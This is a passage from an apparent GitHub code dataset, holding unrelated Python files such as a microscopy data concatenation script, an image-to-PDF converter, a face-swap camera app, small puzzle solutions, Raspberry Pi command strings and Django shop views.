selected_path.find('TIFFs') != -1:\n selected_paths = [selected_path]\n TIFFs_path = selected_path\nelse:\n beyond_listdir_pos = beyond_listdir_pos(\n selected_path, spotMAX_data_foldername\n )\n selector = load.select_exp_folder()\n selector.run_widget(beyond_listdir_pos.all_exp_info,\n title='Concatenate all Positions',\n label_txt='Select experiment to generate DataFrames',\n full_paths=beyond_listdir_pos.TIFFs_paths,\n showinexplorer_button=True,\n all_button=True)\n selected_paths = selector.paths\n TIFFs_path = beyond_listdir_pos.TIFFs_paths[0]\n\nls_TIFFs_path = os.listdir(TIFFs_path)\n\npos_foldernames = [p for p in ls_TIFFs_path\n if p.find('Position_') != -1\n and os.path.isdir(os.path.join(TIFFs_path, p))]\npos_path = os.path.join(TIFFs_path, pos_foldernames[0])\nscan_run_num = prompts.scan_run_nums(vNUM)\nrun_nums = scan_run_num.scan(pos_path)\nif len(run_nums) > 1:\n run_num = scan_run_num.prompt(run_nums,\n msg='Select run number to concatenate: ')\nelse:\n run_num = 1\n\nspotMAX_data_foldername = f'spotMAX_{vNUM}_run-num{run_num}'\n\nrs = replace_or_skip()\n\nfor selected_path in tqdm(selected_paths, ncols=100, unit='experiment'):\n foldername = os.path.basename(selected_path)\n if foldername == spotMAX_data_foldername:\n if not rs.asked_once:\n rs.replace = askyesno('FileExists', 'This experiment already '\n 'contains spotMAX data!\\n'\n 'Do you want to replace them?'\n )\n rs.asked_once = True\n if rs.replace:\n TIFFs_path = f'{os.path.dirname(selected_path)}/TIFFs'\n else:\n rs.skip = True\n elif foldername == 'TIFFs':\n TIFFs_path = selected_path\n rs.skip = False\n\n if not rs.skip:\n AllPos_summary_df = core.spotMAX_concat_pos(TIFFs_path, vNUM=vNUM,\n run_num=run_num, do_save=True)\n\n print('')\n print(f'Loading all dataframes from {selected_path}...')\n # Iterate position folders and concatenate dataframes\n AllPos_summary_df.load_df_from_allpos(vNUM=vNUM, run_num=run_num)\n\n\n print('Generating big DataFrame...')\n\n (ellips_test_df_moth, ellips_test_df_bud,\n ellips_test_df_tot) = AllPos_summary_df.generate_bud_moth_tot_dfs(\n AllPos_summary_df.ellips_test_df_li)\n\n (p_test_df_moth, p_test_df_bud,\n p_test_df_tot) = AllPos_summary_df.generate_bud_moth_tot_dfs(\n AllPos_summary_df.p_test_df_li)\n\n (p_ellips_test_df_moth, p_ellips_test_df_bud,\n p_ellips_test_df_tot) = AllPos_summary_df.generate_bud_moth_tot_dfs(\n AllPos_summary_df.p_ellips_test_df_li)\n\n if AllPos_summary_df.spotfit_df_li:\n (spotfit_df_moth, spotfit_df_bud,\n spotfit_df_tot) = AllPos_summary_df.generate_bud_moth_tot_dfs(\n AllPos_summary_df.spotfit_df_li)\n\n print('Saving all positions concatenated data...')\n AllPos_summary_df.save_AllPos_df(ellips_test_df_moth,\n '1_AllPos_ellip_test_MOTH_data.csv')\n AllPos_summary_df.save_AllPos_df(ellips_test_df_bud,\n '1_AllPos_ellip_test_BUD_data.csv')\n AllPos_summary_df.save_AllPos_df(ellips_test_df_tot,\n '1_AllPos_ellip_test_TOT_data.csv')\n\n AllPos_summary_df.save_AllPos_df(p_test_df_moth,\n '2_AllPos_p-_test_MOTH_data.csv')\n AllPos_summary_df.save_AllPos_df(p_test_df_bud,\n '2_AllPos_p-_test_BUD_data.csv')\n AllPos_summary_df.save_AllPos_df(p_test_df_tot,\n '2_AllPos_p-_test_TOT_data.csv')\n\n AllPos_summary_df.save_AllPos_df(p_ellips_test_df_moth,\n '3_AllPos_p-_ellip_test_MOTH_data.csv')\n AllPos_summary_df.save_AllPos_df(p_ellips_test_df_bud,\n '3_AllPos_p-_ellip_test_BUD_data.csv')\n AllPos_summary_df.save_AllPos_df(p_ellips_test_df_tot,\n '3_AllPos_p-_ellip_test_TOT_data.csv')\n\n if AllPos_summary_df.spotfit_df_li:\n 
AllPos_summary_df.save_AllPos_df(spotfit_df_moth,\n '4_AllPos_spotfit_MOTH_data.csv')\n AllPos_summary_df.save_AllPos_df(spotfit_df_bud,\n '4_AllPos_spotfit_BUD_data.csv')\n AllPos_summary_df.save_AllPos_df(spotfit_df_tot,\n '4_AllPos_spotfit_TOT_data.csv')\n\n spotMAX_inputs_path = AllPos_summary_df.analysis_inputs_path\n AllPos_summary_df.save_ALLPos_analysis_inputs(spotMAX_inputs_path)\n\n print(f'Files saved to {AllPos_summary_df.spotMAX_data_path}')\n print('')\n","repo_name":"SchmollerLab/SeelMito","sub_path":"src/concat/concat_AllPos.py","file_name":"concat_AllPos.py","file_ext":"py","file_size_in_byte":11392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72086504040","text":"import os\nfrom fpdf import FPDF\n\npdf = FPDF()\nimagelist = [] \n\n# Function that renames a file from the format string_X to string_0X, because list.sort orders the numbers this way: 1, 11, 12, 2, 21... \n# We need to pad with a zero to sort correctly: 01, 02, 03, ..., 11, 12, ...\n\ndef rename_file(full_path, filename):\n if filename[-6] == '_':\n newname = full_path.replace(f"_{filename[-5]}.", f"_0{filename[-5]}.") \n os.rename(full_path, newname)\n\n return newname\n else:\n return full_path # If the number does not need to be changed, it is returned unchanged\n \n\n# Function to add images to a list \n\ndef add_files(folder):\n for dirpath, dirnames, filenames in os.walk(folder):\n for filename in filenames:\n\n full_path = os.path.join(dirpath, filename) \n image_name = rename_file(full_path, filename) # Rename the file if required\n imagelist.append(image_name)\n\n imagelist.sort() # Sort the images by name\n\n print("\\nFound " + str(len(imagelist)) + " image files. Converting to PDF....\\n")\n\n\ndef create_pdf(name):\n for image in imagelist:\n pdf.add_page()\n pdf.image(image, 0, 0, 210, 297) # Dimensions of an A4 size sheet.\n\n pdf.output(name, "F") # Save the PDF.\n\n print("PDF generated successfully!")\n\n\n\n# inputs\n\nfolder = input("Enter the path to the folder of images you want to convert to pdf: ") # Folder containing all the images\nname = input("Enter the name of the document to create (name.pdf): ") # Name of the PDF file to generate\n\n\nadd_files(folder)\ncreate_pdf(name)\n","repo_name":"cynthiatcelorio/JPG_to_PDF_converter","sub_path":"jpg_to_pdf.py","file_name":"jpg_to_pdf.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"5512361799","text":"import cv2\r\nfrom managers import WindowManager, CaptureManager\r\nimport rects\r\nfrom trackers import FaceTracker\r\n\r\nclass Camera(object):\r\n\r\n def __init__(self):\r\n self._windowManager = WindowManager('Cameo', self.onKeypress)\r\n self._captureManager = CaptureManager(\r\n cv2.VideoCapture(0), self._windowManager, True)\r\n self._faceTracker = FaceTracker()\r\n self._shoulddrawRects = False\r\n\r\n def run(self):\r\n """Run the main loop"""\r\n self._windowManager.createWindow()\r\n while self._windowManager.isWindowCreated:\r\n self._captureManager.enterFrame()\r\n frame = self._captureManager.frame\r\n\r\n #Swapping faces in a camera feed\r\n self._faceTracker.update(frame)\r\n tracked_faces = self._faceTracker.faces\r\n face_rects = []\r\n for tf in tracked_faces:\r\n face_rects.append(tf.faceRect)\r\n rects.swapRects(frame, frame, face_rects)\r\n \r\n if self._shoulddrawRects:\r\n self._faceTracker.drawRects(frame)\r\n\r\n self._captureManager.exitFrame()\r\n 
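# A minimal sketch of an alternative to the rename_file workaround in
# jpg_to_pdf.py above: a natural-sort key compares embedded numbers
# numerically, so nothing has to be renamed on disk. The filenames below are
# invented examples.
import re

def natural_key(name):
    # Split into digit and non-digit runs; digit runs compare as integers.
    return [int(part) if part.isdigit() else part.lower()
            for part in re.split(r'(\d+)', name)]

files = ['page_11.jpg', 'page_2.jpg', 'page_1.jpg']
print(sorted(files))                   # ['page_1.jpg', 'page_11.jpg', 'page_2.jpg']
print(sorted(files, key=natural_key))  # ['page_1.jpg', 'page_2.jpg', 'page_11.jpg']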
self._windowManager.processEvents()\r\n \r\n def onKeypress(self, keycode):\r\n """Handle a keypress\r\n \r\n space -> Take a screenshot.\r\n tab -> Start/stop recording a screencast\r\n escape -> Quit\r\n x -> Start/stop drawing rectangles\r\n """\r\n if keycode == 32: #space\r\n self._captureManager.writeImage('screenshot.png')\r\n elif keycode == 9: #tab\r\n if not self._captureManager.isWritingVideo:\r\n self._captureManager.startWritingVideo('screencast.mp4')\r\n \r\n else:\r\n self._captureManager.stopWritingVideo()\r\n elif keycode == 120: #x\r\n self._shoulddrawRects = not self._shoulddrawRects\r\n\r\n elif keycode == 27: #escape\r\n self._windowManager.destroyWindow()\r\n \r\n\r\n\r\n\r\nif __name__=="__main__":\r\n Camera().run()\r\n print(cv2.__file__)\r\n\r\n\r\n\r\n","repo_name":"prateekb1912/face-tracker-and-swapper","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"38679241345","text":"\r\n"""\r\n-->*args stands for non-keyword arguments\r\n--->*args allows us to pass a variable number of \r\nnon-keyword arguments to a function.\r\n--->In the function definition, we put an asterisk * before the parameter name to accept \r\nvariable-length arguments.\r\n--->The arguments are packed into a tuple that is available inside the function under the same name as the parameter, without the asterisk *."""\r\ndef addition(*args):\r\n z = 0\r\n for num in args:\r\n z += num\r\n print(z)\r\n"""\r\n--->**kwargs stands for keyword arguments\r\n--->It allows us to pass a variable number of keyword arguments to the function.\r\n--->In the function definition, we put a double asterisk ** before the parameter name to denote \r\nthis type of argument. 
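# A minimal sketch combining the two ideas from the tutorial above: a single
# function can accept both *args and **kwargs, and a wrapper can forward them
# unchanged. All names are invented for the example.
def describe(*args, **kwargs):
    print("positional:", args)    # args arrives as a tuple
    print("keyword:   ", kwargs)  # kwargs arrives as a dict

def forward(func, *args, **kwargs):
    # Pass whatever the caller supplied straight through to func.
    return func(*args, **kwargs)

forward(describe, 1, 2, 3, name="miki", age=50)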
\r\n--->The arguments are packed into a dictionary that is available inside the function under the same name as the parameter, without the double asterisk **.\r\n"""\r\ndef printinfo(**inputdata):\r\n for key, value in inputdata.items(): # read the items in the dictionary\r\n print("{} is {}".format(key,value))\r\n \r\n\r\n# Now you can call the printinfo and addition functions\r\naddition(4, 5) # non-keyword arguments\r\naddition(2, 3, 4)\r\naddition(3, 5, 10, 6)\r\nprintinfo(name="miki", age=50) # keyword arguments\r\nprintinfo(name="miki", sal=20000, age=20)\r\n\r\n"""\r\n-->*args passes a variable number of non-keyword arguments as a tuple, on which \r\ntuple operations can be performed.\r\n--->**kwargs passes a variable number of keyword arguments as a dictionary, on which \r\ndictionary operations can be performed.\r\n"""","repo_name":"sahityasree/automation_coding_test","sub_path":"python/args,kargs.py","file_name":"args,kargs.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"5439869081","text":"import pandas as pd\r\n\r\n\r\nclass DataConversion():\r\n """\r\n Date:2020.10.05\r\n Purpose: Data conversion\r\n Writer: kcs / katd6@naver.com\r\n """\r\n \r\n\r\n def __init__(self,dataFile,skipRows,nRows,useCols,tumorType):\r\n """\r\n skipRows = number of rows to skip \r\n nRows = number of mice\r\n useCols = number of tumour-volume measurement days \r\n tumorType = tumour type \r\n """\r\n self._skipRows=skipRows\r\n self._nRows=nRows\r\n self._useCols=useCols\r\n self._dataFile=dataFile\r\n self._tumorType=tumorType\r\n\r\n def dataConvert(self):\r\n data=pd.read_excel(self._dataFile,skiprows=self._skipRows,nrows=self._nRows,usecols=self._useCols)\r\n y=pd.concat([data.iloc[:,[0]],data.iloc[:,[1]]],axis=1)\r\n y["Day"]=1\r\n y.columns=["Group","Tumor_volume","Day"]\r\n for i in range(1,len(data.columns)-1):\r\n x=pd.concat([data.iloc[:,[0]],data.iloc[:,[i+1]]],axis=1) \r\n x["Day"]=i+1\r\n x.columns=["Group","Tumor_volume","Day"]\r\n y=pd.concat([x,y],axis=0)\r\n print("The converted {} Tumor.xlsx file has been created.".format(self._tumorType))\r\n return y.to_excel("{} Tumor.xlsx".format(self._tumorType))\r\n\r\n def __call__(self):\r\n return self.dataConvert()\r\n\r\n","repo_name":"devcs96/AsanMedicalCenter","sub_path":"DataConversion.py","file_name":"DataConversion.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"73362972839","text":"import dash_core_components as dcc\nimport dash_html_components as html\n\nimport dash_bootstrap_components as dbc\n\nimport pathlib\nimport page_builder as pb\nfrom settings import *\nfrom charts import empty_chart, figure_2_8, map_2_4\n\nchapter_num = '2.4'\nbannerImgSrc = IMAGES_PATH+'AtmosphericSections/Pressure_Tomasz_Szumski_DSC_9880.JPG'\nbannerImgCredit = 'Tomasz Szumski'\n\nintroText = """\nAtmospheric pressure is a key meteorological variable for monitoring the \nclimate system, as the local and large-scale atmospheric circulation patterns \nare driven by differences in air pressure. Changes in large-scale pressure \npatterns can affect local and regional weather. \n """\nbulletPoint1 = """\nAn understanding of atmospheric pressure distributions is required for the \nlong-term simulations of past weather and climate known as reanalyses. This \nunderstanding is also fundamental for weather forecasting. 
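# A minimal sketch of the same wide-to-long reshape that
# DataConversion.dataConvert above performs with a concat loop, done in one
# call with pandas.melt; the toy table is invented.
import pandas as pd

wide = pd.DataFrame({'Group': ['A', 'B'],
                     'Day 1': [100, 90],
                     'Day 2': [140, 110]})
long = wide.melt(id_vars='Group', var_name='Day', value_name='Tumor_volume')
long['Day'] = long['Day'].str.extract(r'(\d+)', expand=False).astype(int)
print(long)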
\n \"\"\"\nbulletPoint2 = \"\"\"\nResources are required to digitise older records and carry out comprehensive \ntime series analysis, which would help in understanding if and how storm \ntracks are changing.\n \"\"\"\nbulletPoints = [bulletPoint1, bulletPoint2]\ntrendChartTitle = 'Annual and Monthly Surface Pressure - Valentia'\ntrendChart = figure_2_8()\n\ntrendCaption = \"\"\"\nMonthly and annual minimum, average and maximum surface pressure at Valentia \nObservatory, Co. Kerry (1940–2019). Little variation is seen in the average \nseries. However, maximum and minimum series show greater variability, \nparticularly the minimum values. This behaviour is linked to mid-latitude \ncyclones or low-pressure systems that frequently pass over Ireland. The very \nlow pressure observed in December 1989 was associated with an Atlantic \ndepression that passed over Ireland, causing some damage due to high seas, \nhigh tides and heavy rain.\n \"\"\"\n\ninfrastructureText = \"\"\"\nAtmospheric pressure measurements are taken automatically at the 25 \nsynoptic weather stations (red dots) operated by Met Éireann. Pressure is \nalso measured at the Irish Marine Data Buoy Observation Network stations \n(orange dots), the first of which was deployed in 2000. To allow for \ncomparison between measurements at different locations and elevations, all \npressure readings are converted to mean sea level (msl) pressure.\n \"\"\"\n\ninfrastructureMap = map_2_4()\n\ninfoLinks = [\n {'text': 'Surface Pressure Essential Climate Variable (ECV) Factsheet',\n 'url': 'https://gcos.wmo.int/en/essential-climate-variables/pressure'},\n {'text': 'Met Éireann historical data',\n 'url': 'https://www.met.ie/climate/available-data/historical-data'},\n {'text': 'Met Éireann information on atmospheric pressure measurements',\n 'url': 'https://www.met.ie/climate/what-we-measure/atmospheric-pressure'},\n {'text': 'Information from the Irish Marine Data Buoy Observation Network',\n 'url': 'http://www.marine.ie/Home/site-area/data-services/real-time-observations/irish-marine-data-buoy-observation-network'},\n {'text': 'Information on Valentia Observatory',\n 'url': 'https://www.met.ie/about-us/our-history/valentia-observatory'},\n]\n\n\n########################################################################################################################\nchapter_dict = next(\n (item for item in CHAPTERS if item['chapter-num'] == chapter_num), None)\n\n\ndef create_layout(app):\n return html.Div(\n children=[\n pb.build_banner(bannerImgSrc,\n bannerImgCredit,\n chapter_dict\n ),\n pb.build_breadcrumb(chapter_dict),\n pb.build_nav(chapter_dict),\n pb.build_intro(introText,\n bulletPoints,\n chapter_dict\n ),\n pb.build_trend(trendChartTitle,\n trendChart,\n trendCaption,\n chapter_dict\n ),\n pb.build_infrastructure(infrastructureText,\n infrastructureMap,\n chapter_dict\n ),\n pb.build_info(infoLinks,\n chapter_dict),\n\n pb.build_nav_carousel(chapter_dict)\n ])\n","repo_name":"ClimateIreland/CI-Climate-Status-Tool","sub_path":"dash_app/pages/_2_4_AtmosphericPressure.py","file_name":"_2_4_AtmosphericPressure.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42404318379","text":"n = 0\n\ndef move(me, enemies, bullets, bonuses, m):\n global n\n\n n += 1\n\n if me['pos'][0]==25:\n for k in range(100):\n if (n // 110) % 2:\n m.up()\n else:\n m.down()\n if me['pos'][0] == 775:\n for k in range(100):\n if (n // 110) % 2:\n m.down()\n 
else:\n m.up()\n\n enemy=enemies[0]\n m.shot(enemy['pos'][0], enemy['pos'][1])","repo_name":"pasha9819/tank_bot","sub_path":"boto2.py","file_name":"boto2.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18353760151","text":"import numpy as np\r\n\r\ndef build_matrix(n: int) -> list:\r\n M = np.zeros((n, n), np.int32)\r\n M[int(np.floor(len(M))/2), int(np.floor(len(M))/2)] = 1\r\n \r\n counter = 2\r\n lap = 0\r\n x, y = int(np.floor(len(M))/2), int(np.floor(len(M))/2)\r\n \r\n for i in range(int(np.floor(len(M))/2)):\r\n lap += 1\r\n \r\n x, y = x+1, y\r\n M[y, x] = counter\r\n counter += 1\r\n \r\n for j in range(2*lap - 1):\r\n x, y = x, y+1\r\n M[y, x] = counter\r\n counter += 1\r\n \r\n for k in range(2*lap):\r\n x, y = x-1, y\r\n M[y, x] = counter\r\n counter += 1\r\n \r\n for l in range(2*lap):\r\n x, y = x, y-1\r\n M[y, x] = counter\r\n counter += 1\r\n \r\n for m in range(2*lap):\r\n x, y = x+1, y\r\n M[y, x] = counter\r\n counter += 1\r\n return M\r\n\r\nA = build_matrix(1001)\r\n\r\nsum_diag, sum_anti = 0, 0\r\n\r\nfor a in range(len(A)):\r\n sum_diag += A[a, a]\r\n sum_anti += A[a, -(a+1)]\r\n\r\nprint(sum_diag + sum_anti - 1)\r\n","repo_name":"colo1701/projecteuler.net_python","sub_path":"pe_028.py","file_name":"pe_028.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13960573030","text":"t=int(input())\nwhile t!=0:\n\tn=int(input())\n\tlist1=list(int(num) for num in input().split())[:n]\n\n\tb=[]\n\tc=0\n\tfor i in list1:\n\t\tif i not in b:\n\t\t\tb.append(i)\t\t\t\t\t\n\t\telse:\n\t\t\tc+=1\t\t\t\t\n\tt-=1\n\tprint(c)","repo_name":"Tarique-web/CODECHEF-PYTHON-CODE-","sub_path":"Voting Frouds/Voting_Frouds.py","file_name":"Voting_Frouds.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12729032021","text":"\"\"\"\nDescription: https://code.google.com/codejam/contest/dashboard?c=6234486#s=p0\n\nSolution: construct an undirected graph where the nodes are villains' names,\nand edges indicate the fact that the villains don't like each other.\n\nThen check if graph is bipartite by finding a 2-coloring of the graph.\n\"\"\"\n\nfrom collections import defaultdict\nimport sys\n\ndef build_graph(edges, unordered=False):\n \"\"\"Takes some edges and constructs a graph in its adjacency list\n representation.\n\n edges -- an iterable of pairs of nodes\n unordered -- if `True`, will construct an unordered graph\n \"\"\"\n\n edges = iter(edges)\n graph = defaultdict(list)\n\n for _ in range(num_pairs):\n a, b = next(edges)\n\n graph[a].append(b)\n if unordered:\n graph[b].append(a)\n\n return graph\n\ndef check_bipartite(graph):\n \"\"\"Checks if a given graph is bipartite, that is, if it can be partitioned\n into two sets of nodes, such that there are no edges between nodes within\n each set, only edges between nodes on different sides.\n\n graph -- adjacency list representation of the graph\n \"\"\"\n\n colors = {}\n\n def bfs(node):\n if node in colors:\n return True\n\n colors[node] = 1\n\n queue = [node]\n while queue:\n node = queue.pop()\n\n color = colors[node]\n neighbor_color = -1 * color\n\n for neighbor in graph[node]:\n if neighbor in colors:\n if colors[neighbor] != neighbor_color:\n return False\n else:\n colors[neighbor] = neighbor_color\n queue.insert(0, 
neighbor)\n\n return True\n\n for node in graph.keys():\n if not bfs(node):\n return False\n\n return True\n\nfin = sys.stdin\nfout = sys.stdout\n\ntest_cases = int(next(fin))\n\nfor case in range(test_cases):\n num_pairs = int(next(fin))\n\n stripped_lines = map(str.strip, fin)\n edges = map(str.split, stripped_lines)\n graph = build_graph(edges, unordered=True)\n\n answer = 'Yes' if check_bipartite(graph) else 'No'\n print(f'Case #{case + 1}: {answer}', file=fout)\n","repo_name":"GabrielMajeri/competitive-programming","sub_path":"kickstart-2015/practice/bad_horse.py","file_name":"bad_horse.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16063211611","text":"import MeCab\nfrom dai4syou import No30\n\nm = No30.mapping_MeCab(\"neko.txt.mecab\")\n\nresult = []\n\nfor words in m:\n for word in words:\n # if word[\"pos\"] == \"動詞\":\n # print(word[\"surface\"])\n # print(word[\"base\"])\n if word[\"pos\"] == \"名詞\" and word[\"pos1\"] == \"サ変接続\":\n result.append(word[\"surface\"])\n\nprint(result)\n","repo_name":"take9999/knock100","sub_path":"dai4syou/No31-33.py","file_name":"No31-33.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17892960372","text":"class Commands:\n hdmi_keep_on = 'echo -e ' + '\\'\\\\033[9;0]\\'' + ' >> /dev/tty1'\n switch_to_tty3 = 'chvt 3'\n clear = 'clear'\n\n screen_on_off = 'tvservice -o'\n\n get_hardware_temp = 'cat /sys/class/thermal/thermal_zone0/temp'\n\n wlan_signal = 'iwconfig wlan0'\n grep_wlan_signal = 'grep -i signal'\n","repo_name":"rosenberg-c/public_rpi_styra_src","sub_path":"services/requests/py/requests/utils/temp/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31156156003","text":"from django.shortcuts import render, redirect\nfrom .models import Alimentos, Boleta, detalle_boleta\nfrom .forms import ItemForm\nfrom .forms import RegistroUserForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Max\nfrom pawpatron.compra import Carrito\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nimport io\nfrom django.http import HttpResponse\nfrom django.template.loader import render_to_string\n\n\n\n# Create your views here.\ndef index(request):\n return render(request,'index.html')\n\ndef knowus(request):\n return render(request,'knowus.html')\n\ndef apires(request):\n return render(request,'apires.html')\n\ndef store(request):\n MAX_ITEMS = 6 # Número máximo de elementos a mostrar por página\n page = request.GET.get('page', 1) # Obtener el número de página actual de la consulta GET\n\n alimentos = Alimentos.objects.all() # Obtener todos los elementos\n\n paginator = Paginator(alimentos, MAX_ITEMS) # Crear un objeto Paginator con los elementos\n try:\n alimentos = paginator.page(page) # Obtener la página actual\n except PageNotAnInteger:\n alimentos = paginator.page(1) # Si el número de página no es un entero, mostrar la primera página\n except EmptyPage:\n alimentos = paginator.page(paginator.num_pages) # Si la página está vacía, mostrar la última página\n\n carrito_compra = Carrito(request)\n total_con_envio, impuesto = 
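# A compact variant of check_bipartite from bad_horse.py above: using
# collections.deque makes both queue ends O(1), where list.insert(0, ...)
# costs O(n) per enqueue. Same 2-coloring BFS idea, with invented toy input.
from collections import defaultdict, deque

def is_bipartite(graph):
    colors = {}
    for start in list(graph):
        if start in colors:
            continue
        colors[start] = 1
        queue = deque([start])
        while queue:
            node = queue.popleft()
            for neighbor in graph[node]:
                if neighbor not in colors:
                    colors[neighbor] = -colors[node]
                    queue.append(neighbor)
                elif colors[neighbor] == colors[node]:
                    return False  # two enemies forced onto the same side
    return True

g = defaultdict(list)
for a, b in [('A', 'B'), ('B', 'C'), ('C', 'A')]:  # odd cycle
    g[a].append(b)
    g[b].append(a)
print(is_bipartite(g))  # False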
carrito_compra.calcular_total_general() # Compute the grand total\n \n return render(request, 'store.html', {'total_con_envio': total_con_envio, 'alimentos': alimentos, 'impuesto': impuesto})\n\n\n\n\n@login_required\ndef crear(request):\n if request.method == "POST":\n itemform = ItemForm(request.POST, request.FILES) # Make sure to include request.FILES to handle the image\n if itemform.is_valid():\n item = itemform.save(commit=False) # Save the form without committing, to apply further changes\n item.categoria_id = request.POST['categoria'] # Assign the category selected in the form\n item.save() # Save the 'item' object to the database\n return redirect('store') # Redirect to the 'store' page after saving the data\n else:\n itemform = ItemForm()\n return render(request, 'crear.html', {'itemform': itemform})\n\n\n@login_required\ndef eliminar(request, id):\n itemEliminado=Alimentos.objects.get(itemid=id) # look up the item by its id\n itemEliminado.delete()\n return redirect('store')\n\n\n\n\n\n\ndef registrar(request):\n data={\n 'form':RegistroUserForm()\n }\n if request.method=="POST":\n formulario=RegistroUserForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n user=authenticate(username=formulario.cleaned_data["username"], password=formulario.cleaned_data["password1"])\n login(request,user)\n return redirect('index')\n data["form"]=formulario \n return render(request,'registrar.html', data)\n\ndef mostrar(request):\n items=Alimentos.objects.all()\n datos={\n 'items':items\n }\n return render(request,'store.html', datos)\n\ndef buscar_alimentos(request):\n if 'q' in request.GET:\n termino_busqueda = request.GET['q']\n alimentos = Alimentos.objects.filter(marca__icontains=termino_busqueda)\n else:\n alimentos = Alimentos.objects.all()\n\n context = {'alimentos': alimentos}\n return render(request, 'store.html', context)\n\n@login_required\ndef modificar(request, item_id):\n itemMod = get_object_or_404(Alimentos, itemid=item_id)\n\n if request.method == "POST":\n formulario = ItemForm(data=request.POST, files=request.FILES, instance=itemMod)\n\n if formulario.is_valid():\n formulario.save()\n return redirect('store')\n\n else:\n formulario = ItemForm(instance=itemMod)\n\n datos = {\n 'form': formulario,\n 'itemMod': itemMod\n }\n\n return render(request, 'modificar.html', datos)\n\n\ndef agregar_producto(request,id):\n carrito_compra = Carrito(request)\n alimento = Alimentos.objects.get(itemid=id)\n carrito_compra.agregar(Alimentos=alimento)\n return redirect('store')\n\ndef eliminar_producto(request, id):\n carrito_compra = Carrito(request)\n alimento = Alimentos.objects.get(itemid=id)\n carrito_compra.eliminar(Alimentos=alimento)\n return redirect('store')\n\n\n\ndef restar_producto(request, id):\n carrito_compra = Carrito(request)\n alimento = Alimentos.objects.get(itemid=id)\n carrito_compra.restar(Alimentos=alimento)\n return redirect('store')\n\ndef limpiar_carrito(request):\n carrito_compra = Carrito(request)\n carrito_compra.limpiar()\n return redirect('store') \n\n@login_required\ndef generarBoleta(request):\n precio_total = 0\n for key, value in request.session['carrito'].items():\n precio_total += int(value['precio']) * int(value['cantidad'])\n \n # Compute the tax amount (e.g. 10%)\n impuestos = precio_total * 0.1\n \n # Compute the total including tax\n total_con_impuestos = int(precio_total + impuestos + 1200)\n \n boleta = Boleta(total=total_con_impuestos)\n 
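# A minimal sketch of the money arithmetic in generarBoleta above, using
# decimal.Decimal with an explicit rounding rule instead of binary floats and
# int() truncation. The 10% tax and flat 1200 shipping mirror the view above;
# the line items are invented.
from decimal import Decimal, ROUND_HALF_UP

items = [(Decimal('19990'), 2), (Decimal('4990'), 1)]  # (price, quantity)
subtotal = sum(price * qty for price, qty in items)
tax = (subtotal * Decimal('0.10')).quantize(Decimal('1'), rounding=ROUND_HALF_UP)
total = subtotal + tax + Decimal('1200')  # flat shipping fee
print(subtotal, tax, total)  # 44970 4497 50667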
boleta.save()\n \n productos = []\n for key, value in request.session['carrito'].items():\n producto = Alimentos.objects.get(itemid=value['Alimentos_id'])\n cant = value['cantidad']\n subtotal = cant * int(value['precio'])\n detalle = detalle_boleta(id_boleta=boleta, itemid=producto, cantidad=cant, subtotal=subtotal)\n detalle.save()\n productos.append(detalle)\n \n producto.cantidad_disponible -= cant\n producto.save()\n \n datos = {\n 'productos': productos,\n 'boleta': boleta,\n 'fecha': boleta.fechaCompra,\n 'total': boleta.total\n }\n \n request.session['boleta'] = boleta.id_boleta\n carrito = Carrito(request)\n carrito.limpiar()\n\n # Render the 'detallecarrito.html' template with the receipt data\n return render(request, 'detallecarrito.html', datos)\n\ndef descargarBoleta(request, boleta_id):\n # Fetch the receipt data\n boleta = Boleta.objects.get(id_boleta=boleta_id)\n productos = detalle_boleta.objects.filter(id_boleta=boleta)\n\n # Build the data for the template\n datos = {\n 'boleta': boleta,\n 'productos': productos,\n 'fecha': boleta.fechaCompra,\n 'total': boleta.total\n }\n\n # Generate the TXT file content from a template\n contenido = render_to_string('boleta.txt', datos)\n\n # Create the HTTP response with the file attachment\n response = HttpResponse(content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename="boleta.txt"'\n\n # Write the content into the HTTP response\n response.write(contenido)\n\n # Return the HTTP response that downloads the receipt\n return response\n\n\n","repo_name":"Belkr6/ET_PGY3121_Edgard_Guaico_0012D","sub_path":"pawpatron/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
